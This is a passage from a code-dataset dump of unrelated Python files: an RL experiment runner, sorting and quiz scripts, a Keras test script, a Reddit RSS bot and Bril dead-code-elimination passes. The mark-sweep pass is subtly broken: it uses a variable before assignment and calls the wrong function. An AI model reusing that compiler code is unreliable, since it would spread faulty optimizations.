settings\nseed_base = 42\nnum_runs = 30\noverwrite_existing_files = False\n# config_file = \"experiments_config_windy.json\"\nsave_dir = \"saved_experiments\"\n\n\ndef load_config(config_file):\n \"\"\"\n Loads the experiment configurations from the json file specified by 'config_file'.\n Convert environment and module strings to classes\n \"\"\"\n\n def init_classes(config, module_name):\n # Convert class name strings to class instances\n for i in range(len(config[module_name])):\n module = importlib.import_module(f'project.{module_name}')\n class_name = config[module_name][i]\n config[module_name][i] = getattr(module, class_name)\n\n with open(config_file) as f:\n config = json.load(f)\n\n init_classes(config, ENV_KEY)\n init_classes(config, NET_KEY)\n\n return config\n\n\ndef get_file_name_and_config(env,\n net,\n batch_size,\n discount_factor,\n semi_gradient,\n lr,\n lr_step_size,\n lr_gamma,\n layer,\n num_episodes,\n replay_memory,\n seed):\n\n \"\"\" Returns a unique file name based on the provided arguments and a config dict is returned with which\n the provided argument values can be accessed. \"\"\"\n\n gradient_mode = 'semi' if semi_gradient else 'full'\n env_name = env.__name__\n net_name = net.__name__\n file_name = f'{gradient_mode}/{env_name}/{net_name}_{batch_size}_{discount_factor}_{semi_gradient}_' \\\n f'{lr}_{lr_step_size}_{lr_gamma}_{layer}_{num_episodes}_{replay_memory}_{seed}'\n\n current_config = {\n ENV_KEY: env_name,\n NET_KEY: net_name,\n BAT_KEY: batch_size,\n DIS_KEY: discount_factor,\n GRA_KEY: gradient_mode,\n LR_KEY: lr,\n LR_SS_KEY: lr_step_size,\n LR_GAMMA_KEY: lr_gamma,\n LAYER_KEY: layer,\n SEED_KEY: seed,\n TRAIN_EPS_KEY: num_episodes,\n REP_MEM_KEY: replay_memory\n }\n\n return file_name, current_config\n\n\ndef set_seeds(seed, env):\n \"\"\" For reproducibility, seeds 'random', 'numpy', 'PyTorch' and the gym 'env' with the provided seed. \"\"\"\n \n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n env.seed(seed)\n\n\ndef save_file(results, current_config, file_name):\n \"\"\"\n Pickles the results.\n :param results: The experiment results.\n :param current_config: The config dict.\n :param file_name: The name for the pickle file. This name should be unique to the experiment parameters.\n :return: None\n \"\"\"\n\n (episode_durations_train,\n losses,\n episode_rewards_train,\n timespan,\n episode_durations_test,\n episode_rewards_test,\n q_vals) = results\n\n \"\"\"\n Save the results to specified file\n \"\"\"\n\n data = {\n \"config\": current_config,\n \"train\": {\n \"episode_durations\": episode_durations_train,\n \"episode_rewards\": episode_rewards_train,\n \"losses\": losses,\n \"duration\": timespan,\n \"q_vals\": q_vals\n },\n \"test\": {\n \"episode_durations\": episode_durations_test,\n \"episode_rewards\": episode_rewards_test\n }\n }\n pickle.dump(data, open(f'{save_dir}/{file_name}.pkl', 'wb'))\n\n\ndef smooth(x, N):\n \"\"\" Smooths the values provided in 'x'. N defines over how many consecutive values to smooth. \"\"\"\n cumsum = np.cumsum(np.insert(x, 0, 0))\n return (cumsum[N:] - cumsum[:-N]) / float(N)\n\n\ndef save_side_plot(plot_1, plot_1_name, plot_2, plot_2_name, file_name, extension='pdf'):\n \"\"\" Saves two plots side by side. \"\"\"\n\n fig, axes = plt.subplots(nrows=1, ncols=2)\n axes[0].plot(plot_1)\n axes[0].set_title(plot_1_name)\n axes[1].plot(plot_2)\n axes[1].set_title(plot_2_name)\n fig.tight_layout()\n plt.savefig(f'{save_dir}/{file_name}.{extension}')\n plt.close(fig)\n\n\ndef save_train_plot(episode_durations, episode_losses, file_name, smoothing=10):\n \"\"\" Plots and saves the training results. \"\"\"\n\n save_side_plot(smooth(episode_durations, smoothing), 'Episode durations per episode',\n smooth(episode_losses, smoothing), 'Average loss per episode',\n file_name + '_train')\n\n\ndef save_test_plot(episode_durations, episode_rewards, file_name, smoothing=10):\n \"\"\" Plots and saves the testing results. \"\"\"\n\n save_side_plot(smooth(episode_durations, smoothing), 'Episode durations per episode',\n smooth(episode_rewards, smoothing), 'Rewards per episode',\n file_name + '_test')\n\n\ndef do_loop(config, func):\n \"\"\" Creates the cartesian product from all lists in config.\n Each iteration from do_loop runs 'func' once with the next element in this cartesian product. \"\"\"\n\n runs_settings = itertools.product(config[ENV_KEY],\n config[NET_KEY],\n config[BAT_KEY],\n config[DIS_KEY],\n config[GRA_KEY],\n config[LAYER_KEY],\n config[LR_KEY],\n config[LR_SS_KEY],\n config[LR_GAMMA_KEY],\n config[REP_MEM_KEY])\n\n for run_settings in runs_settings:\n yield func(*run_settings, config)\n\n\ndef run(env, net, batch_size, discount_factor, semi_gradient, layer, lr, lr_step_size, lr_gamma, replay_mem, config):\n \"\"\"\n Runs the experiments.\n :param env: The environment on which to run the experiments.\n :param net: The network used for the experiments.\n :param batch_size: The size of the batches sampled from the replay memory buffer.\n :param discount_factor: The discount factor with which to scale the Q values of the next step.\n :param semi_gradient: Whether to use semi gradient or full gradient.\n :param layer: A list where each element is the number of nodes in a layer in the network.\n :param lr: The learning rate.\n :param lr_step_size: For the learning rate scheduler. After how many episodes to scale the learning rate.\n :param lr_gamma: The scaling factor for the learning rate scheduler.\n :param replay_mem: The size of the memory replay buffer.\n :param config: The config dict with which to access the parameters for this specific experiments.\n :return: None\n \"\"\"\n\n # saves the Q values for environments A-Split and N-State Random Walk\n save_q_vals = env.__name__ in ['ASplit', 'NStepRandomWalk']\n for seed_iter in range(num_runs):\n seed = seed_base + seed_iter # next seed\n\n for num_episodes in config[TRAIN_EPS_KEY]:\n file_name, current_config = get_file_name_and_config(env=env,\n net=net,\n batch_size=batch_size,\n discount_factor=discount_factor,\n semi_gradient=semi_gradient,\n lr=lr,\n lr_step_size=lr_step_size,\n lr_gamma=lr_gamma,\n layer=layer,\n num_episodes=num_episodes,\n replay_memory=replay_mem,\n seed=seed)\n\n print('Running: ', current_config)\n\n # Skip the current run if the data file already exists\n if os.path.isfile(f'{save_dir}/{file_name}.pkl'):\n print('Data file for the current run already exists. Skip it.')\n continue\n\n os.makedirs(f'{save_dir}/{os.path.dirname(file_name)}', exist_ok=True)\n\n # Instantiate environment object\n env_ins = env()\n\n # set the seeds in every iteration\n set_seeds(seed, env=env_ins)\n\n # Instantiate network object by hyperparameters\n net_ins = net(in_features=env_ins.shape,\n out_features=env_ins.action_space.n,\n architecture=layer,\n discount_factor=discount_factor)\n policy = EpsilonGreedyPolicy(net_ins)\n\n # Start training\n start = time.time()\n\n episode_durations_train, losses, episode_rewards_train, q_vals = train_episodes(env=env_ins,\n policy=policy,\n num_episodes=num_episodes,\n batch_size=batch_size,\n learn_rate=lr,\n semi_grad=semi_gradient,\n use_replay=True,\n lr_step_size=lr_step_size,\n lr_gamma=lr_gamma,\n save_q_vals=save_q_vals,\n replay_mem_size=replay_mem)\n timespan = time.time() - start\n print(f'Training finished in {timespan} seconds')\n\n torch.save(net_ins.state_dict(), f'{save_dir}/{file_name}.pt') # save the NN weights\n\n save_train_plot(episode_durations_train, losses, file_name)\n\n # Start testing\n episode_durations_test = list()\n episode_rewards_test = list()\n\n if config[TEST_EPS_KEY] > 0:\n test_start = time.time()\n current_config[TEST_EPS_KEY] = config[TEST_EPS_KEY]\n print(f'Start running {config[TEST_EPS_KEY]} episodes for test')\n\n episode_durations_test, episode_rewards_test = test_episodes(env_ins, policy, config[TEST_EPS_KEY])\n print(f'Test finished in {time.time() - test_start} seconds')\n\n save_test_plot(episode_durations_test, episode_rewards_test, file_name)\n\n results = (episode_durations_train, losses, episode_rewards_train,\n timespan, episode_durations_test, episode_rewards_test, q_vals)\n\n # Save results\n save_file(results, current_config, file_name)\n\n\ndef main(experiment_file):\n \"\"\" Loads the configurations for the experiments and run them. \"\"\"\n\n if overwrite_existing_files:\n answer = input(\n \"\"\"\n Do you want to overwrite all the saved files?\n All the files will be deleted before starting.\n (y/n) \"\"\")\n\n if answer == 'y':\n try:\n shutil.rmtree(save_dir)\n time.sleep(1)\n except:\n print('Error, perhaps some files are read-only.')\n\n os.makedirs(save_dir)\n else:\n sys.exit(0)\n\n # The configurations for this experiment.\n config = load_config(experiment_file)\n\n # Each iteration in the loop performs one experiment.\n for _ in do_loop(config, run):\n pass\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Run experiments.')\n parser.add_argument('file', type=str, help='The experimental file name.')\n parser.add_argument('--save_dir', type=str, default=\"saved_experiments\",\n help='Directory to save results to.')\n args = parser.parse_args()\n save_dir = args.save_dir\n main(args.file)\n\n# ========================================================================= #\n# Memorial for the best for for for ... for loop ever coded: #\n# ========================================================================= #\n\n# def do_loop(config, func):\n# for env in config[ENV_KEY]:\n# for net in config[NET_KEY]:\n# for batch_size in config[BAT_KEY]:\n# for discount_factor in config[DIS_KEY]:\n# for semi_gradient in config[GRA_KEY]:\n# for layer in config[LAYER_KEY]:\n# for lr in config[LR_KEY]:\n# for lrss in config[LR_SS_KEY]:\n# for lr_gamma in config[LR_GAMMA_KEY]:\n# for replay_memory in config[REP_MEM_KEY]:\n# yield func(env, net, batch_size, discount_factor, semi_gradient,\n# layer, lr, lrss, lr_gamma, replay_memory, config)\n","repo_name":"tom-kersten/Reinforcement_Learning_Project","sub_path":"run_experiments.py","file_name":"run_experiments.py","file_ext":"py","file_size_in_byte":14189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22904411582","text":"# Best case o(n^2)\n# Average case o(n^2)\n# Worst case o(n^2)\n\n#Bu ilk yaptığım kendi düşüncemle bu da O(n^2) fakat içeride 3 tane constant var ve çok çok az da olsa performans kaybı olabilir.\ndef selectionSort(arr):\n for i in range(0, len(arr)):\n for j in range(i+1, len(arr)):\n print(j)\n if(arr[i] > arr[j]):\n tmp = arr[i]\n arr[i] = arr[j] \n arr[j] = tmp\n return arr\n\n\ndef selectionSort2(arr):\n # Neden len arr -1 dedim çünkü sondan bir önceki indexe geldiğinde 1 tane rakam kalıyor geriye onuda j kontrol edip yer değiştirecek yada\n # değiştirmeyecek eğer son indexede giderse eğer j nin bir sonraki rakamı olmayacak ve hata vermez ama boş yere range ile boş bir değer oluşturacak.\n # list(range(6,6)) --> boş bir liste dönderecektir.\n for i in range(0, len(arr)-1):\n print(arr, i)\n min = i\n for j in range(i+1, len(arr)):\n # print(j)\n # burada yer değiştirme olmuyor sadece fake bir şekilde indexini tutuyoruz döngü bittikten sonra yer değiştirme gerçekleşiyor...\n if(arr[min] > arr[j]):\n min = j\n tmp = arr[i]\n arr[i] = arr[min] \n arr[min] = tmp\n return arr\n\n\nprint(selectionSort2([5,4,1,2,0,-1]))\n","repo_name":"merthamit/Over-300-leetcode-solutions","sub_path":"sorting algorithms/selection-sort.py","file_name":"selection-sort.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"24643475065","text":"# initialize an empty list\n\nl = []\n\n# add elements to list\n\nl.append(1)\n\n# initialize a dictionary\n\nd = {}\n\n# add elements to dictionary\n\nd['a'] = 1\n\n\n# create a class\n\n\nclass Person:\n\n def __init__(self, name):\n self.name = name\n\n def say_hello(self):\n print(\"Hello\", self.name)\n\n\n# instantiate the class\nob = Person(\"Parav\")\n\n# call a method of an object\nob.say_hello()\n","repo_name":"paravsingla/codemania-ai","sub_path":"Day 1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"71435516853","text":"#!/usr/bin/env python3\n__author__ = 'mgooch'\nfrom BioinformaticsFunctions import *\ndebug = True\nimport sys\nlines = sys.stdin.read().splitlines()\npattern = lines[0]\ngenome = lines[1]\nd = int(lines[2])\nif 'debug' in globals():\n\tprint(\"pattern : %s\" % pattern)\n\tprint(\"genome : %s\" % genome)\n\tprint(\"d : %d\" % d)\n\npositions = ApproximatePatternSearch(pattern, genome, d)\nprint(\" \".join(str(x) for x in positions))\n","repo_name":"kotoroshinoto/Coursera_Python_Bioinformatics","sub_path":"Course1/ApproximatePatternSearch.py","file_name":"ApproximatePatternSearch.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71615657334","text":"n = int(input())\ns = input()\n\nres = (n*(n-1)) // 2\n\nfor i in range(2):\n cont = 1\n for a in range(1,n):\n if s[a] == s[a-1]:\n cont += 1\n else:\n res -= cont - i\n cont = 1\n s = s[::-1]\nprint(res)\n","repo_name":"fernandozanutto/competitive_programming","sub_path":"Codeforces/1238/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"35245480692","text":"import sys\n\ndef recur( size):\n global R, C\n if size == 1:\n return R * 2 + C\n\n area = (size//2) * (size//2) \n _r = R//(size/2)\n _c = C//(size/2)\n\n R -= (size//2) * _r\n C -= (size//2) * _c \n\n return area * (_r * 2 + _c) + recur(size//2)\n\n\nif __name__ == \"__main__\":\n input = sys.stdin.readline\n n, R, C = map(int, input().split(\" \"))\n \n print( int(recur(2**n)))","repo_name":"lyh951212/algorithm","sub_path":"recursion/baekjoon_1074.py","file_name":"baekjoon_1074.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"966299417","text":"import os\nimport sys\nimport numpy as np\nimport keras\nfrom keras.models import load_model\nfrom keras.preprocessing import sequence\n\ndef indexing_testing_data(testing_data_path, testing_data_index_path, dict_path):\n d = read_dict(dict_path)\n print('Indexing testing data ... ')\n with open(testing_data_path, 'r') as test_data:\n all_index_text = []\n test_data.readline()\n counter = 0\n for line in test_data:\n counter += 1\n first_comma = line.index(',')\n index = line.strip()[:first_comma]\n text = line.strip()[first_comma+1:]\n index_text = ''\n words = text.split(' ')\n for word in words:\n if word in d:\n index_text += str(d.index(word) + 1) +' '\n else:\n index_text += str(1) +' ' \n all_index_text.append(index_text.strip())\n if os.path.isfile(testing_data_index_path):\n os.remove(testing_data_index_path)\n with open(testing_data_index_path, 'a') as index_data:\n index = 0\n for index_text in all_index_text:\n index_data.write(str(index) +','+ index_text +'\\r\\n')\n index += 1\n return None\n\ndef read_test_data(testing_data_index_path):\n x = []\n with open(testing_data_index_path, 'r') as test_data:\n for line in test_data:\n index, text = line.strip().split(',')\n x.append(list(map(int, text.split(' '))))\n return x\n\ndef write_answer(pred, answer_path):\n if os.path.isfile(answer_path):\n os.remove(answer_path)\n with open(answer_path, 'a') as answer:\n index = 0\n answer.write('id,label\\r\\n')\n for score in pred:\n if score >= 0.5:\n answer.write(str(index) +',1\\r\\n')\n else:\n answer.write(str(index) +',0\\r\\n')\n index += 1 \n\ndef read_dict(dict_path):\n d = []\n with open(dict_path, 'r') as dict_txt:\n for line in dict_txt:\n d.append(line.strip())\n return d\n\ndef main():\n testing_data_path = sys.argv[1]\n answer_path = sys.argv[2]\n testing_data_index_path = './testing_data_index.txt'\n model_path = './model_7.h5?dl=1'\n dict_path = './dict.txt'\n max_review_length = 30\n indexing_testing_data(testing_data_path, testing_data_index_path, dict_path)\n x_test = read_test_data(testing_data_index_path)\n x_test = sequence.pad_sequences(x_test, maxlen=max_review_length, padding='post')\n model = load_model(model_path)\n pred = model.predict(x_test)\n write_answer(pred, answer_path)\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"csdai0324/NTU_Machine_Learning_2017_FALL","sub_path":"hw4/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74894243571","text":"#!/usr/bin/env python\n\nimport config\nimport feedparser\nimport praw\nimport time\n\n\nclass Reddit(object):\n\n def __init__(self):\n self.reddit = praw.Reddit(\n client_id=config.REDDIT_CLIENT_ID,\n client_secret=config.REDDIT_CLIENT_SECRET,\n username=config.REDDIT_USERNAME,\n password=config.REDDIT_PASSWORD,\n user_agent='RSS to reddit post script'\n )\n\n def submit(self, sub, entries):\n subreddit = self.reddit.subreddit(sub)\n for title, url in entries.iteritems():\n try:\n subreddit.submit(\n title,\n url=url,\n resubmit=False,\n send_replies=False\n )\n except praw.exceptions.APIException:\n pass\n\n\ndef getFeedEntries(url):\n entries = dict()\n feed = feedparser.parse(url)\n for item in feed.entries:\n entries[item.title] = item.link\n return entries\n\n\ndef main():\n reddit = Reddit()\n\n while True:\n for subreddit, feed_url in config.FEEDS.iteritems():\n entries = getFeedEntries(feed_url)\n reddit.submit(subreddit, entries)\n\n time.sleep(config.RUN_FREQUENCY_MINS * 60)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"austen0/gists","sub_path":"reddit-rss-bot.py","file_name":"reddit-rss-bot.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72483964213","text":"import random as rnd\nby = {'Пушкин':'1799', 'Лермонтов':'1814', 'Ломоносов':'1711', 'Циолковский':'1857', 'Путин':'1952'}\n# Правильные ответы 'Пушкин'- 1799, 'Лермонтов' - 1814, 'Ломоносов' - 1711, 'Циолковский' - 1857, 'Путин' - 1952\ncnt = len(by)\nrepeat = True\nwhile repeat:\n\tar = rnd.sample(range(cnt),cnt)\n\tcorrect = 0\n\tkeys = list(by)\n\tfor i in ar:\n\t\tg = input('В каком году родился {}? '.format(keys[i]))\n\t\tcorrect += g == by[keys[i]]\n\tprint('Количество правильных ответов:', correct)\n\tprint('Количество ошибок:', cnt - correct)\n\tprint('Процент правильных ответов:', correct/cnt*100)\n\tprint('Процент неправильных ответов:', (1-correct/cnt)*100)\n\trepeat = input('Начать игру сначала (да/нет?) ') == 'да'\n","repo_name":"piligrim7/lesson_02","sub_path":"victory.py","file_name":"victory.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5580585540","text":"from copy import deepcopy\nfrom collections import OrderedDict\nimport click\nimport sys\nimport json\n\nfrom ssa import bril_to_ssa, is_ssa\nfrom dominator_utilities import build_dominance_frontier_w_cfg, get_backedges_w_cfg, get_dominators_w_cfg, build_dominance_tree_w_cfg\nfrom cfg import (form_blocks, join_blocks,\n form_cfg_w_blocks, add_unique_exit_to_cfg, reverse_cfg, INSTRS, SUCCS, PREDS)\nfrom bril_core_constants import *\nfrom bril_core_utilities import *\n\n\n# ---------- MARK SWEEP DEAD CODE ELIMINATIONS -------------\n\n\nMARKED = True\nNOT_MARKED = not MARKED\n\n\ndef is_critical(instr):\n return is_io(instr) or is_call(instr) or is_ret(instr)\n\n\ndef find_nearest_useful_rec(curr_block, useful_post_dominators, post_dominator_tree):\n children = post_dominator_tree[curr_block]\n for c in children:\n if c in useful_post_dominators:\n return c\n else:\n result = find_nearest_useful_rec(\n c, useful_post_dominators, post_dominator_tree)\n if result != None:\n return result\n return None\n\n\ndef find_nearest_useful_post_dominator(curr_block, useful_blocks, post_dominating_blocks, post_dominator_tree):\n useful_post_dominators = list(\n set(useful_blocks).intersection(\n set(post_dominating_blocks)\n )\n )\n if useful_post_dominators == []:\n return None\n return find_nearest_useful_rec(curr_block, useful_post_dominators, post_dominator_tree)\n\n\ndef function_mark_sweep(func):\n \"\"\"\n ASSUMES SSA FORM\n https://yunmingzhang.files.wordpress.com/2013/12/dcereport-2.pdf\n \"\"\"\n # set up data structures\n cfg = form_cfg_w_blocks(func)\n cfg_w_exit = add_unique_exit_to_cfg(cfg, UNIQUE_CFG_EXIT)\n cdg = reverse_cfg(cfg_w_exit)\n _, post_dominated_by = get_dominators_w_cfg(cdg, UNIQUE_CFG_EXIT)\n post_dominator_tree = build_dominance_tree_w_cfg(cdg, UNIQUE_CFG_EXIT)\n post_dominator_frontier = build_dominance_frontier_w_cfg(\n cdg, UNIQUE_CFG_EXIT)\n\n # initialize\n id2instr = dict()\n id2block = dict()\n id2mark = dict()\n def2id = dict()\n useful_blocks = set()\n worklist = []\n for block in cfg:\n for instr in cfg[block][INSTRS]:\n instr_id = id(instr)\n if is_critical(instr):\n worklist.append(instr_id)\n id2mark[instr_id] = MARKED\n useful_blocks.add(block)\n else:\n id2mark[instr_id] = NOT_MARKED\n if DEST in instr:\n def2id[instr[DEST]] = instr_id\n id2instr[instr_id] = instr\n id2block[instr_id] = block\n\n # mark phase\n while worklist != []:\n current_inst_id = worklist.pop()\n current_inst = id2instr[current_inst_id]\n if ARGS in current_inst:\n for defining in current_inst[ARGS]:\n if id2mark[def_id] == NOT_MARKED:\n def_id = def2id[defining]\n id2mark[def_id] = MARKED\n useful_blocks.add(id2block[def_id])\n worklist.append(def_id)\n\n curr_block = id2block[current_inst_id]\n for rdf_block in post_dominator_frontier[curr_block]:\n last_instr = None\n for block_instr in reversed(cfg[rdf_block][INSTRS]):\n last_instr = block_instr\n break\n if last_instr != None:\n last_instr_id = id(last_instr)\n id2mark[last_instr_id] = MARKED\n useful_blocks.add(id2block[last_instr_id])\n worklist.append(last_instr_id)\n\n # sweep phase\n final_instrs = []\n for instr in func[INSTRS]:\n instr_id = id(instr)\n if id2mark[instr_id] == MARKED:\n final_instrs.append(instr)\n else:\n if is_br(instr):\n # replace branch to jmp to nearest useful post dominator\n curr_block = id2block[instr_id]\n post_dominating_blocks = list(\n set(post_dominated_by[curr_block]) - {curr_block})\n nearest = find_nearest_useful_post_dominator(\n curr_block, useful_blocks, post_dominating_blocks, post_dominator_tree)\n if nearest != None:\n new_jmp = {OP: JMP, LABELS: [nearest]}\n final_instrs.append(new_jmp)\n elif is_label(instr):\n final_instrs.append(instr)\n elif is_jmp(instr):\n final_instrs.append(instr)\n else:\n # deleted\n pass\n return final_instrs\n\n\ndef mark_sweep_dce(program):\n \"\"\"\n Implementation of Mark Sweep Style DCE to remove more dead code. Meant to\n work in conjunction with SSA code.\n\n Can be run alongside other passes with lvn/gvn.\n \"\"\"\n try:\n is_ssa(program)\n except:\n program = bril_to_ssa(program)\n for func in program[FUNCTIONS]:\n new_instrs = function_safe_adce(func)\n func[INSTRS] = new_instrs\n is_ssa(program)\n return program\n\n\n# ---------- AGGRESSIVE DEAD CODE ELIMINATIONS -------------\n\n\nUNIQUE_CFG_EXIT = \"UNIQUE.EXIT\"\n\nLIVE = True\nNOT_LIVE = not LIVE\n\n\ndef func_has_side_effects():\n \"\"\"\n This is also incorrect, in that if a function has no side effects\n that does not mean it can be removed;\n in particular, one could have a function that is a simple infinite loop.\n These should be kept!\n \"\"\"\n pass\n\n\ndef function_safe_adce(func):\n \"\"\"\n From: http://www.cs.cmu.edu/afs/cs/academic/class/15745-s12/public/lectures/L14-SSA-Optimizations-1up.pdf\n Mark all instructions as Live that are:\n I/O\n Store into memory TODO: when Bril has memory instructions\n Terminator - RET\n Calls a function with side effects (e.g. most functions)\n Label\n\n Conservative Safer version of ADCE\n Keeps all Labels in Graph\n When an instruction in a block is live, add the terminator to that block automatically, e.g. jmp, ret, br\n When a backedge is detected heading in a block, add the terminator for the other block heading into this block\n - This keeps all loops in the program\n - Does not remove infinite loops that do nothing.\n - Use backedge detector for this\n \"\"\"\n # build important auxillary data structures (READ-ONLY)\n instrs = func[INSTRS]\n\n cfg = form_cfg_w_blocks(func)\n entry = list(cfg.keys())[0]\n cfg_w_exit = add_unique_exit_to_cfg(cfg, UNIQUE_CFG_EXIT)\n backedge_start_blocks = set(\n list(map(lambda pair: pair[1], get_backedges_w_cfg(cfg, entry))))\n cdg = reverse_cfg(cfg_w_exit)\n cdg[entry][PREDS].append(UNIQUE_CFG_EXIT)\n cdg[UNIQUE_CFG_EXIT][SUCCS].append(entry)\n control_dependence = build_dominance_frontier_w_cfg(cdg, UNIQUE_CFG_EXIT)\n\n # initialize data structures (WRITE TO)\n id2instr = OrderedDict()\n id2block = OrderedDict()\n def2id = OrderedDict()\n for block in cfg:\n for instr in cfg[block][INSTRS]:\n id2instr[id(instr)] = instr\n if DEST in instr:\n def2id[instr[DEST]] = id(instr)\n id2block[id(instr)] = block\n\n # initialize worklist\n marked_instrs = {id(instr): NOT_LIVE for instr in instrs}\n worklist = []\n for instr in instrs:\n curr_block = id2block[id(instr)]\n if is_io(instr) or is_ret(instr) or is_jmp(instr) or is_call(instr):\n # mark current instr as live\n marked_instrs[id(instr)] = LIVE\n # add arguments of current instr as live\n if ARGS in instr:\n for a in instr[ARGS]:\n # add only if not an argument of the function\n if a in def2id:\n worklist.append(def2id[a])\n # add terminator for block for current instr\n for instr in reversed(cfg[curr_block][INSTRS]):\n if is_terminator(instr):\n worklist.append(id(instr))\n # add the control dependency parent of this instruction's block\n for cd_block in control_dependence[curr_block]:\n for instr in reversed(cfg[cd_block][INSTRS]):\n if is_terminator(instr):\n worklist.append(id(instr))\n # add terminators for any start of a backedge\n if curr_block in backedge_start_blocks:\n for instr in reversed(cfg[curr_block][INSTRS]):\n if is_terminator(instr):\n worklist.append(id(instr))\n\n # DO WORKLIST\n while worklist != []:\n instr_id = worklist.pop()\n if marked_instrs[instr_id] == LIVE:\n continue\n # Grab Operands of S\n marked_instrs[instr_id] = LIVE\n # add arguments of current_instr\n instr = id2instr[instr_id]\n if ARGS in instr:\n for a in instr[ARGS]:\n # add only if not an argument of the function\n if a in def2id:\n worklist.append(def2id[a])\n # add terminator for block for current instr\n curr_block = id2block[instr_id]\n for inner_instr in reversed(cfg[curr_block][INSTRS]):\n if is_terminator(inner_instr):\n worklist.append(id(inner_instr))\n # add the control dependency parent of this instruction's block\n for cd_block in control_dependence[curr_block]:\n for inner_instr in reversed(cfg[cd_block][INSTRS]):\n if is_terminator(inner_instr):\n worklist.append(id(inner_instr))\n # add terminators for any start of a backedge\n if curr_block in backedge_start_blocks:\n for inner_instr in reversed(cfg[curr_block][INSTRS]):\n if is_terminator(inner_instr):\n worklist.append(id(inner_instr))\n\n # FINISH by keeping alive instructions\n final_instrs = []\n for instr_id in marked_instrs:\n if marked_instrs[instr_id] == LIVE:\n final_instrs.append(id2instr[instr_id])\n elif is_label(id2instr[instr_id]):\n final_instrs.append(id2instr[instr_id])\n return final_instrs\n\n\ndef function_adce(func):\n \"\"\"\n From: http://www.cs.cmu.edu/afs/cs/academic/class/15745-s12/public/lectures/L14-SSA-Optimizations-1up.pdf\n Mark all instructions as Live that are:\n I/O\n Store into memory TODO: when Bril has memory instructions\n Terminator - RET\n Calls a function with side effects (e.g. most functions)\n Label\n\n NOTE: This algorithm is actually incorrect in that for infinite loops\n that do not have I/O or memory access or function call, the loop gets entirely\n eliminated. This is a consequence of the no-use conditions that are searched for.\n \"\"\"\n # build important auxillary data structures (READ-ONLY)\n instrs = func[INSTRS]\n\n cfg = form_cfg_w_blocks(func)\n entry = list(cfg.keys())[0]\n cfg_w_exit = add_unique_exit_to_cfg(cfg, UNIQUE_CFG_EXIT)\n cdg = reverse_cfg(cfg_w_exit)\n cdg[entry][PREDS].append(UNIQUE_CFG_EXIT)\n cdg[UNIQUE_CFG_EXIT][SUCCS].append(entry)\n control_dependence = build_dominance_frontier_w_cfg(cdg, UNIQUE_CFG_EXIT)\n\n # initialize data structures (WRITE TO)\n id2instr = OrderedDict()\n id2block = OrderedDict()\n def2id = OrderedDict()\n for block in cfg:\n for instr in cfg[block][INSTRS]:\n id2instr[id(instr)] = instr\n if DEST in instr:\n def2id[instr[DEST]] = id(instr)\n id2block[id(instr)] = block\n\n # initialize worklist\n marked_instrs = {id(instr): NOT_LIVE for instr in instrs}\n worklist = []\n for instr in instrs:\n if is_io(instr) or is_jmp(instr) or is_ret(instr) or is_call(instr):\n marked_instrs[id(instr)] = LIVE\n if ARGS in instr:\n for a in instr[ARGS]:\n # add only if not an argument of the function\n if a in def2id:\n worklist.append(def2id[a])\n # add the control dependency parent of this instruction's block\n for cd_block in control_dependence[id2block[id(instr)]]:\n for instr in reversed(cfg[cd_block][INSTRS]):\n if is_terminator(instr):\n worklist.append(id(instr))\n\n # DO WORKLIST\n while worklist != []:\n instr_id = worklist.pop()\n if marked_instrs[instr_id] == LIVE:\n continue\n # Grab Operands of S\n marked_instrs[instr_id] = LIVE\n instr = id2instr[instr_id]\n if ARGS in instr:\n args = instr[ARGS]\n for a in args:\n # add only if not an argument of the function\n if a in def2id:\n worklist.append(def2id[a])\n\n for cd_block in control_dependence[id2block[instr_id]]:\n for instr in reversed(cfg[cd_block][INSTRS]):\n if is_terminator(instr):\n worklist.append(id(instr))\n\n # FINISH by keeping oive instructions\n final_instrs = []\n for instr_id in marked_instrs:\n if marked_instrs[instr_id] == LIVE:\n final_instrs.append(id2instr[instr_id])\n elif is_label(id2instr[instr_id]):\n final_instrs.append(id2instr[instr_id])\n return final_instrs\n\n\ndef global_adce(program):\n \"\"\"\n Aggressive Dead Code Elimination\n\n NOTE: The ADCE is actually incorrect in that for infinite loops\n that do not have I/O or memory access or function call, the loop gets entirely\n eliminated. This is a consequence of the no-use conditions that are searched for.\n\n NOTE: SAFE_ADCE should be conservatively sound\n \"\"\"\n try:\n is_ssa(program)\n except:\n program = bril_to_ssa(program)\n for func in program[FUNCTIONS]:\n new_instrs = function_safe_adce(func)\n func[INSTRS] = new_instrs\n is_ssa(program)\n return program\n\n\n# ---------- TRIVIAL DEAD CODE ELIMINATIONS -------------\n\n\ndef delete_unused_dce(program):\n \"\"\"\n Delete all instructions for which a variable is assigned but never read from.\n \"\"\"\n for func in program[\"functions\"]:\n written_variables = set()\n for instr in func[\"instrs\"]:\n if \"dest\" in instr:\n written_variables.add(instr[\"dest\"])\n\n for instr in func[\"instrs\"]:\n if \"args\" in instr:\n args = set(instr[\"args\"])\n written_variables -= args\n\n new_instrs = []\n for instr in func[\"instrs\"]:\n if \"dest\" in instr:\n if instr[\"dest\"] not in written_variables:\n 